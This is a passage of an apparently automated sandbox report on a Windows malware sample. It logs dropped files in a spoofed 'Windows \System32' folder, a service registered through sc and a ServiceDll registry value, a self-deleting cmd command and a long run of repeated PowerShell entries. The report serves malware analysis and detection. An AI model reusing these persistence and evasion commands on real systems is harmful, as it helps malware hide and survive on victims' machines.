Source: libiconv-2.dll.40.drStatic PE information: section name: /19
Source: libiconv-2.dll.40.drStatic PE information: section name: /31
Source: libiconv-2.dll.40.drStatic PE information: section name: /45
Source: libiconv-2.dll.40.drStatic PE information: section name: /57
Source: libiconv-2.dll.40.drStatic PE information: section name: /70
Source: libiconv-2.dll.40.drStatic PE information: section name: /81
Source: libiconv-2.dll.40.drStatic PE information: section name: /92
Source: libintl-9.dll.40.drStatic PE information: section name: .xdata
Source: libintl-9.dll.40.drStatic PE information: section name: /4
Source: libintl-9.dll.40.drStatic PE information: section name: /19
Source: libintl-9.dll.40.drStatic PE information: section name: /31
Source: libintl-9.dll.40.drStatic PE information: section name: /45
Source: libintl-9.dll.40.drStatic PE information: section name: /57
Source: libintl-9.dll.40.drStatic PE information: section name: /70
Source: libintl-9.dll.40.drStatic PE information: section name: /81
Source: libintl-9.dll.40.drStatic PE information: section name: /92
Source: x543664.dat.40.drStatic PE information: section name: .fptable
Source: C:\Windows\System32\svchost.exeCode function: 53_2_649487B2 push r11; ret 53_2_649487ED
Source: C:\Windows\System32\svchost.exeCode function: 53_2_660224A8 push rax; retf 53_2_660224B1
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829984B push 00000000h; retf 53_2_68299850
Source: C:\Windows\System32\svchost.exeCode function: 53_2_682970AC push rax; iretd 53_2_682970AD
Source: C:\Windows\System32\svchost.exeCode function: 53_2_682951B2 push rdx; retn 0000h53_2_682951B3
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829998B push 00000000h; ret 53_2_68299990
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829999B push 00000000h; iretd 53_2_682999A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829AA73 push 00000000h; ret 53_2_6829AA78
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829ABBB push 00000000h; retf 53_2_6829ABC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829ABB3 push 00000000h; ret 53_2_6829ABB8
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829A7AB push 00000000h; iretd 53_2_6829A7B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333C2B8 push 050001C2h; retn 0001h53_2_00007FFDA333C2C5
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333C2C8 push 680001C2h; retn 0001h53_2_00007FFDA333C2CD
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333C2D0 push 680001C2h; retn 0001h53_2_00007FFDA333C2D5

Persistence and Installation Behavior

Source: C:\Windows\System32\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x543664\Parameters ServiceDll C:\Windows\System32\x543664.dat
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\usvcinsta64.exe
Source: C:\Windows\System32\cmd.exeExecutable created and started: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows \System32\printui.exe
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exe
Source: C:\Users\user\Desktop\pyld64.exeFile created: C:\Windows\System32\usvcinsta64.exe
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.exe
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeFile created: C:\Users\user\Desktop\pyld64.exe
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x543664.dat
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dll

Boot Survival

Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\reg.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x543664\Parameters
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\Ld0f3NDosJ.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
